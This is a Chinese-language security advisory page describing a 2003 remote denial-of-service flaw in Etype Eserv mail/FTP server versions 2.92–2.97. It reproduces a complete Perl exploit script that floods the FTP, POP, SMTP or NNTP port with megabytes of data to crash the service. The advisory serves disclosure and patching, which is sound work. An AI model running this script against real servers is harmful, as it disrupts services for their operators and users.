首页 -> 安全研究
安全研究
安全漏洞
EType EServ FTP远程拒绝服务攻击漏洞
发布日期:2003-01-04
更新日期:2003-01-09
受影响系统:
Etype Eserv 2.96描述:
Etype Eserv 2.95
Etype Eserv 2.94
Etype Eserv 2.93
Etype Eserv 2.92
Etype Eserv 2.97
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
BUGTRAQ ID: 6519
Eserv是一款集成Mail、News、Web、FTP和代理服务器的系统。
Eserv的FTP服务程序对超大数据处理不正确,远程攻击者可以利用这个漏洞对FTP服务进行拒绝服务攻击。
攻击者连接Eserv FTP服务器,发送超过5005312b字节大小数据,可使FTP服务崩溃,这不是由于缓冲区溢出引起,因此不能用于提升权限和执行任意代码。
<*来源:D4rkGr3y (grey_1999@mail.ru)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104171844131985&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
######################################################
#EServ/2.97 remote DoS xsploit
#Bugs founded in v.2.97 but I think that 2.98 is
#vulnerable too.
#################
#Usage: perl EServ.DoS.pl [host] [port] [service_type]
#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
#Example: perl EServ.DoS.pl localhost 110 pop
#################
#If something wrong or u wanna to discuss something,
#contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
#######################################################
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";
print "\n\n";;
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
if ($param) {
$num = "4950001" if $param eq "pop";
$num = "4960000" if $param eq "smtp";
$num = "5005312" if $param eq "ftp";
$num = "5001215" if $param eq "nntp";
die "Error in params\n" if !$num;
print "Connecting...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>
SOCK_STREAM) or die "Socket
error.\n";
print "OK\n";
$buf .= $data x $num;
print "Attacking...";
print $socket "$buf\n";
print "OK\n\n";
print "Vizit us at www.dhgroup.org";
close($socket);
} else {
print "Error in Params.\n";
print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
exit;
}
#EOF
建议:
厂商补丁:
Etype
-----
根据报告最新版本EServ 2.99已经修正了这个漏洞,不过没有得到供应商证实:
http://www.eserv.ru/eserv/
浏览次数:2848
严重程度:0(网友投票)
绿盟科技给您安全的保障